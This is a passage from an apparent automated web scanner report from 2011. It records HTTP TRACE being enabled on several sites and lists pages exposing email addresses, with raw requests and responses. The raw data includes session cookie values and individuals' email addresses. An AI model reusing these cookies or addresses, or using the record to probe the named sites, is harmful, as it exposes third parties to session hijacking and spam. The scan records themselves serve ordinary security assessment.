Date: Tue, 26 Apr 2011 01:21:53 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hipaarx.net
Cookie: ff455e7ca7e8f58c


23.14. http://www.hipaasecurityrx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipaasecurityrx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hipaasecurityrx.net
Cookie: cfe6faeb61459807

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:57 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hipaasecurityrx.net
Cookie: cfe6faeb61459807


23.15. http://www.saintcorporation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saintcorporation.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.saintcorporation.com
Cookie: 7edf3aee1a45554

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:44:10 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.saintcorporation.com
Cookie: 7edf3aee1a45554


23.16. https://www.saintcorporation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.saintcorporation.com
Cookie: f34949cd15a8514c

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:52 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.saintcorporation.com
Cookie: f34949cd15a8514c


24. Email addresses disclosed  previous  next
There are 61 instances of this issue:


24.1. https://account.snap.com/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The following email address was disclosed in the response:

Request

GET /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:28 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<sam@conio.net>
...[SNIP]...

24.2. http://blog.ikano.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.ikano.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: blog.ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.6.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:25 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.ikano.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmpg.o
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...

24.3. http://blog.ikano.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.ikano.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: blog.ikano.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.6.10.1303823875

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 13:18:39 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.ikano.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 13:18:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head profile="http://gmpg.o
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...

24.4. http://blog.ikano.com/wp-content/themes/WP_Premium/WP_Premium/taber.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.ikano.com
Path:   /wp-content/themes/WP_Premium/WP_Premium/taber.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/themes/WP_Premium/WP_Premium/taber.js HTTP/1.1
Host: blog.ikano.com
Proxy-Connection: keep-alive
Referer: http://blog.ikano.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.6.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:26 GMT
Server: Apache/2.0.59 (CentOS)
Last-Modified: Mon, 30 Jun 2008 21:48:20 GMT
ETag: "18c5c9-3ea7-37c37100"
Accept-Ranges: bytes
Content-Length: 16039
Connection: close
Content-Type: application/x-javascript

/*==================================================
$Id: tabber.js,v 1.9 2006/04/27 20:51:51 pat Exp $
tabber.js by Patrick Fitzgerald pat@barelyfitz.com

Documentation can be found at the following URL:
http://www.barelyfitz.com/projects/tabber/

License (http://www.opensource.org/licenses/mit-license.php)

Copyright (c) 2006 Patrick Fi
...[SNIP]...

24.5. http://bridgefront.com/products_custom_course_development.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bridgefront.com
Path:   /products_custom_course_development.php

Issue detail

The following email address was disclosed in the response:

Request

GET /products_custom_course_development.php HTTP/1.1
Host: bridgefront.com
Proxy-Connection: keep-alive
Referer: http://www.bridgefront.com/contactus.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1; __utmc=199010044; __utmb=199010044.1.10.1303780600

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Custom E-Learning |
...[SNIP]...
<a href="mailto:info@bridgefront.com">info@bridgefront.com</a>
...[SNIP]...
<a href="mailto:info@bridgefront.com">
...[SNIP]...

24.6. http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.stopzilla.com
Path:   /images/is3/site/scripts/jquery/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /images/is3/site/scripts/jquery/jquery.cookie.js HTTP/1.1
Host: download.stopzilla.com
Proxy-Connection: keep-alive
Referer: http://www.is3.com/about/contactUs.do
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=122441289.1303826107.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=122441289.1374117684.1303826107.1303826107.1303826107.1; __utmc=122441289; __utmb=122441289.2.10.1303826107

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1296000
Content-Type: application/x-javascript
Last-Modified: Tue, 16 Mar 2010 20:07:36 GMT
Accept-Ranges: bytes
ETag: "0b4235244c5ca1:27e3"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
Date: Tue, 26 Apr 2011 13:58:57 GMT
Content-Length: 4341

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

24.7. http://freemarker.com/top.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemarker.com
Path:   /top.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /top.php?d=freemarker.com HTTP/1.1
Host: freemarker.com
Proxy-Connection: keep-alive
Referer: http://freemarker.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=i7s9s5sueqcrhpr4chuavarau2

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 13:03:54 GMT
Server: lighttpd
Content-Length: 2311

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>popup management</title>
<script
...[SNIP]...
<a href="mailto:dirrliwl@freemarker.com">
...[SNIP]...
<a href="mailto:2915161843_1303823034@freemarker.com">
...[SNIP]...

24.8. http://ikano.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:17:42 GMT
Server: Microsoft-IIS/6.0
Content-Length: 40886
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAABCTBBA=OLEKIPADNLNANJACJFBNPLPF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IKANO.com - Inter
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...

24.9. http://ikano.com/contact.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /contact.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
Referer: http://ikano.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.6.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:37 GMT
Server: Microsoft-IIS/6.0
Content-Length: 43732
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...
<a href="mailto:ispsupport@ikano.com">
...[SNIP]...

24.10. http://ikano.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:00 GMT
Server: Microsoft-IIS/6.0
Content-Length: 39645
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com -
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...

24.11. http://ikano.com/press/dslextremepress.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/dslextremepress.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/dslextremepress.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.5.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:22 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31115
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...
<a href="mailto:info@ikano.com">info@ikano.com</a>
...[SNIP]...
<a href="mailto:dpollei@ikano.com">dpollei@ikano.com</a>
...[SNIP]...

24.12. http://ikano.com/press/dslextremepress2.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/dslextremepress2.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/dslextremepress2.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 32112
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...
<a href="mailto:info@ikano.com">info@ikano.com</a>
...[SNIP]...
<a href="mailto:dpollei@ikano.com">dpollei@ikano.com</a>
...[SNIP]...

24.13. http://ikano.com/press/referralagent.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/referralagent.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/referralagent.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:17 GMT
Server: Microsoft-IIS/6.0
Content-Length: 32056
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...
<a href="mailto:dpollei@ikano.com">dpollei@ikano.com</a>
...[SNIP]...

24.14. http://ikano.com/press/serverhuggerpress.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ikano.com
Path:   /press/serverhuggerpress.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /press/serverhuggerpress.asp HTTP/1.1
Host: ikano.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABCTBBA=NLEKIPADFPBEDKBDIAMCABGF; __utmz=18335905.1303823875.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=18335905.1341540347.1303823875.1303823875.1303823875.1; __utmc=18335905; __utmb=18335905.2.10.1303823875

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:18:19 GMT
Server: Microsoft-IIS/6.0
Content-Length: 31637
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>IKANO.com
...[SNIP]...
<a href="http://www.ikano.com/contact.asp">sales@ikano.com</a>
...[SNIP]...
<a hfref="mailto:info@ikano.com">info@ikano.com</a>
...[SNIP]...
<a href="mailto:dpollei@ikano.com">dpollei@ikano.com</a>
...[SNIP]...

24.15. http://learn.bridgefront.com/intro/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /intro/

Issue detail

The following email address was disclosed in the response:

Request

GET /intro/ HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CBB236D385A70A54A6BE4F341848EE80; __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1; __utmc=199010044; __utmb=199010044.4.10.1303780600

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:31:54 GMT
Server: Apache/2.2.3 (Red Hat)
ETag: W/"4744-1302518279000"
Last-Modified: Mon, 11 Apr 2011 10:37:59 GMT
Content-Length: 4744
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


...[SNIP]...
<meta name="Author Email" content="info@bridgefront.com" />
...[SNIP]...

24.16. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The following email address was disclosed in the response:

Request

GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9; ysf=08QxMuCE5xcRp6XxvP9UqQQVFjUnPTRIkxcDabYECLHYlgjWjedO.aMI9RGj2l09q.GrzSj0ZGNpKWL4tC5RhhHyRxFHPlU.kFCMEd44rNZiy50Es8NrBu7yXU0mNtf0YtrWeEjpo31kxbqrG0YGBvIbxraTXVC9nbjUpNtv9aXJppMZot2l11h5_ZSFAPhtqxX_6SVAEVGb0NKTjuEX9ZYv2zDAxiWP9cGTqFS0cy9sv336lSqBJx7SukerpgGajbVm5ixswV527gxjaF3uyCr7m1vg_4ERgH_kHGmM1GC3lZg7kpdA4se.Qgpe8f7RJkYS8crdx364dtmP6Js16W8_gxE1rMXJs1u9F8J4fm3eQRNc_54_vpkaiaTqfiqOcFZODhj_ghb_GOxG1FWZmW.i2zsaspuKA4yive5ZswfNSY0PlT8WhNaRhUIxTsKui8a4VYdjdz.5HLTMtIko4yhA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:55:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 42663


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<p id='ex'>(e.g. free2rhyme@yahoo.com)</p>
...[SNIP]...

24.17. http://mydownload.paretologic.revenuewire.net/pcha/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mydownload.paretologic.revenuewire.net
Path:   /pcha/homepage

Issue detail

The following email address was disclosed in the response:

Request

GET /pcha/homepage HTTP/1.1
Host: mydownload.paretologic.revenuewire.net
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
